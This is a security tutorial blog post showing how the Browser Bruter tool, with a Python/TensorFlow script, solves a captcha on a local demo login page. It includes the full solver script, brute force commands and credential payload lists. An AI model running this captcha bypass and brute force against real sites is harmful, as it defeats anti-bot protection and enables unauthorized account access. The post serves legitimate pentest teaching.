NSConclave

  • Home
  • About
  • Workshops
  • Chakravyuh
  • Tickets
  • Speakers
  • Venue
  • Previous edition
    NSConclave 2020 NSConclave 2023
  • Brute Goat
    Blog



Cracking The Captchas using Browser Bruter and Python

[Image generated using AI tools]

By Jafar Pathan

Without a doubt, captchas are one of the most critical security components of a web application, preventing automated bots from interacting with it.

But they are also annoying during pentest and bug bounty engagements.

Thanks to the Browser Bruter's Python Scripting Engine, we can bypass such captchas using Machine Learning.

So buckle up, as today I am going to demonstrate how you can bypass such captchas by utilizing the powerful Python Scripting Engine of the Browser Bruter.

Note: the resources shown in this blog are all available in the 'res' directory of the Browser Bruter.

Setting up the Target Web Application

Let's first look at our target. For demonstration purposes, I have developed a sample page with captcha logic, as shown in the image below -

[Image: sample page with captcha]

To follow along, you can start this sample page by navigating to 'BrowserBruter/res/samples/captcha/' and running the following command -

python3 captcha.py

If you get the following error -

ModuleNotFoundError: No module named 'captcha'

just run the following command -

pip3 install captcha

and if, while running the above command, you get an error like the following -

error: externally-managed-environment

run the following command instead -

pip3 install captcha --break-system-packages

and you are good to go. You should see output like the following -

[Image: output of captcha.py]

Now navigate to http://127.0.0.1:5000 and you should see the sample web page shown in the first image above.

Let's analyze the target web application.

[Image: target login form]

This is a basic login form with an added captcha to prevent automated attacks.

It has three input fields:

  1. Username
  2. Password
  3. Captcha

Note: As this is for demonstration purposes, the username and password for the web application are admin:admin, and a successful login returns a welcome response.

Take 1: Fuzzing Without Captcha Bypass

Let's run the Browser Bruter brute force attack against this page and analyze the behavior of the attack.

To perform the brute force attack, I have prepared the following payload lists:

  1. usernames.txt:

    portaladmin
    admin@gmail.com
    guest
    admin
    email@123.com
    
  2. passwords.txt:

    1234
    super_strong_password
    qesdgs6e56
    wqwer
    password
    123123123
    admin
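
As a rough sketch of what these two lists imply: assuming attack mode 4 tries every username against every password (an assumption about the mode's behavior, not something taken from Browser Bruter's code), the lists above would produce 5 x 7 = 35 login attempts. The helper name credential_pairs is hypothetical, and the snippet only enumerates the pairs; it does not send any requests.

```python
from itertools import product

# Payloads copied from usernames.txt and passwords.txt above
usernames = ["portaladmin", "admin@gmail.com", "guest", "admin", "email@123.com"]
passwords = ["1234", "super_strong_password", "qesdgs6e56", "wqwer",
             "password", "123123123", "admin"]


def credential_pairs(users, pwds):
    """Return every (username, password) combination.

    Assumption: this mirrors a brute force run that pairs each
    username with each password.
    """
    return list(product(users, pwds))


pairs = credential_pairs(usernames, passwords)
print(len(pairs))                   # number of attempts
print(("admin", "admin") in pairs)  # whether the valid pair is among them
```

The valid admin:admin pair is part of the list, so any failure to find it in the run below cannot be blamed on the payloads.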
    

First, let's build up the options required to run the attack.

  1. --target: This will be 'http://127.0.0.1:5000/'
  2. --attack: As we are going to run a brute force attack, we will use attack mode 4
  3. --elements-payloads: I have found the ids of the elements, which are 'username' and 'password' respectively. So the option will be --elements-payloads username:usernames.txt,password:passwords.txt
  4. --button: I have found the name of the 'login' button, which is 'submit', making our option --button submit
  5. --fill: As the application requires the captcha field too, for now we will use the --fill option to fill it with a random value. I have found its id to be 'captcha_input', so the option will be --fill captcha_input

So our final command will be as follows:

python3 BrowserBruter.py --target http://127.0.0.1:5000/ --attack 4 --elements-payloads username:usernames.txt,password:passwords.txt --button submit --fill captcha_input
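
If you prefer to assemble this command from a script, the following is a minimal sketch. It uses only the options described above; build_command is a hypothetical helper written for this post, not part of Browser Bruter.

```python
import shlex


def build_command(target, attack, elements_payloads, button, fill=None):
    """Assemble the BrowserBruter.py command line from its options.

    elements_payloads maps element ids to payload files.
    This helper is illustrative only; it is not shipped with Browser Bruter.
    """
    mapping = ",".join(f"{element}:{path}"
                       for element, path in elements_payloads.items())
    args = [
        "python3", "BrowserBruter.py",
        "--target", target,
        "--attack", str(attack),
        "--elements-payloads", mapping,
        "--button", button,
    ]
    if fill:
        args += ["--fill", fill]
    return args


args = build_command(
    target="http://127.0.0.1:5000/",
    attack=4,
    elements_payloads={"username": "usernames.txt", "password": "passwords.txt"},
    button="submit",
    fill="captcha_input",
)
print(shlex.join(args))
```

The resulting list can be passed to subprocess.run(args) from the Browser Bruter directory, which avoids shell quoting issues.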

Now let's run this and see the result:

[Images: attack run and generated report]

The attack has finished and the report has been generated. Let's open this report in ReportExplorer.py

[Images: report opened in ReportExplorer.py]

There is a lot of traffic, and it's impossible to analyze each and every request one by one to see whether we got a successful response.

To make things easier, thanks to the rich features of Browser Bruter, we can use the --grep option of ReportExplorer with the "welcome" keyword to search the HTTP traffic, because 'welcome', 'hello', 'success', and 'admin' are common keywords that appear in the successful response of a login page.

I will run following command for this:

python3 ReportExplorer.py --report </path/to/report.csv> --grep welcome
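
To illustrate the idea behind a keyword search over a CSV report, here is a minimal sketch. It is not ReportExplorer's implementation, and the report's real column layout is not described in this post, so the function simply treats the report as generic CSV and matches the keyword against every cell. The name grep_rows and the two-column sample data are made up for illustration.

```python
import csv
import io


def grep_rows(csv_file, keyword):
    """Return rows in which any cell contains keyword (case-insensitive)."""
    needle = keyword.lower()
    return [row for row in csv.reader(csv_file)
            if any(needle in cell.lower() for cell in row)]


# Tiny made-up report used only for illustration; real reports
# have their own columns.
sample_report = io.StringIO(
    "payload,response\n"
    "guest:1234,Invalid captcha\n"
    "admin:admin,Welcome admin\n"
)
matches = grep_rows(sample_report, "welcome")
print(matches)
```

For a real report file, open it with open(path, newline="") and, if cells hold large HTTP bodies, consider raising the limit with csv.field_size_limit.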

[Image: results of --grep welcome]

Well, our attack has failed, and we know the reason: the captcha. Even though we provided valid credentials, we were unsuccessful in brute forcing the login page.

Now, to brute force this login, we first have to bypass the captcha. Let's jump to it.

Take 2: Bypassing the Captcha

I have prepared and trained an ML model to crack this captcha. How did I train it? Well, that's a story for another time.

Today, we will integrate this Machine Learning model into Browser Bruter to extend its functionality to bypass this captcha.

To achieve this, I have written the following short Python script -

import os
import random
import cv2
import string
from PIL import Image, ImageDraw, ImageFont
from captcha.image import ImageCaptcha
import numpy as np
import tensorflow as tf
from tensorflow.keras import layers, models
from tensorflow.keras.utils import to_categorical
import requests

# Function to preprocess and predict text from a sample captcha
def predict_captcha(model, sample_captcha_path, label_to_int):
    # Load the sample PNG captcha as a grayscale image
    sample_captcha = cv2.imread(sample_captcha_path, cv2.IMREAD_GRAYSCALE)
    if sample_captcha is None:
        # cv2.imread returns None instead of raising when the file cannot be read
        raise FileNotFoundError(f"Could not read captcha image: {sample_captcha_path}")

    # Resize to four characters of 28 pixels each; cv2.resize takes (width, height)
    sample_captcha = cv2.resize(sample_captcha, (28 * 4, 28))

    # Chop the sample captcha into four 28x28 character tiles
    character_width = 28
    characters = [sample_captcha[:, i:i + character_width] for i in range(0, sample_captcha.shape[1], character_width)]

    # Reverse mapping: class index -> character
    int_to_label = {idx: char for char, idx in label_to_int.items()}

    # Preprocess each character and make predictions
    predicted_text = ""
    for char_image in characters:
        # Add batch and channel dimensions and scale pixel values to [0, 1]
        char_image = char_image.reshape((1, 28, 28, 1)).astype("float32") / 255.0
        predictions = model.predict(char_image)
        predicted_label_idx = int(np.argmax(predictions))
        predicted_text += int_to_label[predicted_label_idx]

    return predicted_text

# Map labels to integers
label_to_int = {char: idx for idx, char in enumerate(string.ascii_letters + string.digits)}
num_classes = len(label_to_int)

# Load the saved model
model = tf.keras.models.load_model("res/samples/captcha_model.keras") # Change Here, Please provide correct path of the model
# Re-compile the model to ensure metrics are set
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])

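# 'driver' and 'By' are used here without being imported or defined, so the script
# relies on the Browser Bruter Python Scripting Engine making them available
image_element = driver.find_element(By.ID, "captcha_image")
img_url = image_element.get_attribute('src')

# Download the captcha image and save it to disk
response = requests.get(img_url)
response.raise_for_status()  # stop early if the download failed
with open('image.png', 'wb') as file:
    file.write(response.content)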

# Example usage of the prediction function
#sample_captcha_path = "sample.png"  # Change this to the path of your sample captcha
predicted_text = predict_captcha(model, 'image.png', label_to_int)
print("Predicted Text:", predicted_text)

image_input_element = driver.find_element(By.ID, "captcha_input")

image_input_element.clear()
image_input_element.send_keys(predicted_text)

Below is the summary of what the above script is doing:

  • It imports libraries for image processing (cv2, PIL), machine learning (TensorFlow), and web automation

  • The main function predict_captcha processes and recognizes text from CAPTCHA images:

    • Takes a CAPTCHA image as input
    • Converts it to grayscale and resizes it
    • Splits the image into individual characters
    • Uses a neural network model to predict each character
    • Combines the character predictions into the complete CAPTCHA text

  • The code creates a mapping between ASCII letters/digits and integers using label_to_int

  • It loads a pre-trained Keras model from "res/samples/captcha_model.keras"

  • The script finds a CAPTCHA image on a webpage using Selenium's driver.find_element

  • It downloads the CAPTCHA image from the extracted URL

  • After prediction, it:

    • Locates the input field for the CAPTCHA solution
    • Clears any existing text
    • Enters the predicted CAPTCHA text
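
To make the splitting and decoding steps from the summary concrete without needing TensorFlow or OpenCV, here is a small standard-library sketch. It reuses the label_to_int mapping from the script; split_into_characters, decode_predictions, and one_hot are hypothetical helpers, and the hand-made score vectors stand in for real model.predict output.

```python
import string

# Same label mapping as in the script above
label_to_int = {char: idx for idx, char in enumerate(string.ascii_letters + string.digits)}
int_to_label = {idx: char for char, idx in label_to_int.items()}


def split_into_characters(image, character_width=28):
    """Split a 2D image (list of pixel rows) into equal-width tiles."""
    width = len(image[0])
    return [[row[start:start + character_width] for row in image]
            for start in range(0, width, character_width)]


def decode_predictions(score_vectors):
    """Pick the highest-scoring class per character and join the labels."""
    text = ""
    for scores in score_vectors:
        best_idx = max(range(len(scores)), key=scores.__getitem__)
        text += int_to_label[best_idx]
    return text


def one_hot(idx, size=len(label_to_int)):
    """Build a score vector with a single winning class (illustration only)."""
    return [1.0 if i == idx else 0.0 for i in range(size)]


# A blank 28 x 112 "image" splits into four 28 x 28 tiles
blank = [[0] * (28 * 4) for _ in range(28)]
tiles = split_into_characters(blank)
print(len(tiles), len(tiles[0]), len(tiles[0][0]))

# Indices 0, 26, 52, and 61 map to 'a', 'A', '0', and '9'
print(decode_predictions([one_hot(0), one_hot(26), one_hot(52), one_hot(61)]))
```

With 52 letters and 10 digits, the model has 62 output classes per character, which is why the mapping has to match the one used during training.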

The above script requires several Python packages. To install them, run pip3 install -r res/samples/requirements-for-ml-sample.txt
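
One thing to keep in mind about the download step: requests.get fetches the image in a separate HTTP request, outside the browser session. That works for the sample page here, but on applications that tie the captcha to the browser session, the downloaded image might not be the one displayed in the browser. A possible alternative, sketched below, is to save the image exactly as rendered using the Selenium WebElement screenshot method. save_captcha_image is a hypothetical helper, and how well the model handles a screenshot compared with the original PNG has not been tested here.

```python
def save_captcha_image(image_element, path="image.png"):
    """Save the captcha as the browser rendered it.

    image_element is expected to be a Selenium WebElement; its
    screenshot(filename) method writes a PNG and returns True on success.
    """
    if not image_element.screenshot(path):
        raise RuntimeError(f"Could not save captcha screenshot to {path}")
    return path
```

Inside the script, this could replace the requests download with save_captcha_image(driver.find_element(By.ID, "captcha_image")), leaving the rest of the flow unchanged.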

Now that we are done with our script, let's import it into Browser Bruter. We can do this using the --python-file option, which Browser Bruter provides as a way to interact with the Python Scripting Engine.

So our command will be as follows:

python3.12 BrowserBruter.py --target http://127.0.0.1:5000/ --attack 4 --elements-payloads username:usernames.txt,password:passwords.txt --button submit --python-file res/samples/bb-predict.py --print-error

I have made the following changes to our original command:

  • I have removed the --fill option because we will enter the correct captcha in captcha_input using the Machine Learning model.
  • I have added the --print-error option because I want to see whether there are any issues with my Python script.

Now, let's run this bad boy:

[Images: attack running with the captcha script]

Yeah, it's working. We are able to bypass the captcha by integrating Machine Learning into Browser Bruter.

Let's wait for the attack to finish.

[Image: attack finished]

It's done. Let me analyze the result.

[Image: analysis of the result]

And here it is: we found the credentials and successfully bypassed the captcha.

So, this is how you can leverage the Python Scripting Engine of Browser Bruter to do all kinds of crazy stuff and fuzz the unfuzzable.

Keep fuzzing! Keep Hacking!


Contact

If you have any questions, suggestions, or feedback, feel free to connect with me on:

Github: https://github.com/zinja-coder

LinkedIn: https://www.linkedin.com/in/jafar-pathan/

Twitter: https://x.com/zinja_coder

About: https://zinja-coder.github.io/

Threads: jafar.khan.pathan_


Contact Us

1, Sanjiv Baug,
Nr. Parimal Crossing,
Paldi,
Ahmedabad - 380007
Phone: +91 - 7926 6500 90
Email: conclave@net-square.com

© Copyright 2024 Net Square Solutions Pvt. Ltd. All Rights Reserved